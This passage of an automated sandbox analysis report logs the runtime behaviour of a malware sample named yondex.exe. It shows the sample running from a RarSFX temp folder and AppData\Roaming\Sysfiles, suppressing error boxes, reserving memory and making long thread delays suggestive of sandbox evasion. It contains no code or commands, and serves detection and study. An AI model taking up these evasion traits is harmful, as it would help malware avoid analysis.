                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeMemory allocated: 13F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeMemory allocated: 2DA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeMemory allocated: 4DA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeMemory allocated: C70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeMemory allocated: 2710000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeMemory allocated: 4710000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeMemory allocated: 2EF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeMemory allocated: 3060000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeMemory allocated: 2EF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeMemory allocated: E60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeMemory allocated: 27E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeMemory allocated: E60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 599641Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 599531Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 599422Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 599304Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 599202Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 599094Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598967Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598858Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598745Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598342Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 597544Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 597437Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 597328Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 597172Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 596953Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 596750Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeThread delayed: delay time: 596203Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 599688Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 599469Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 599266Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 599104Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598907Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598672Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 598016Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597813Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597422Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597219Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 597030Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596844Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596657Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596275Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 596104Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595922Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595563Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595375Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 595172Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 594938Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 594438Jump to behavior
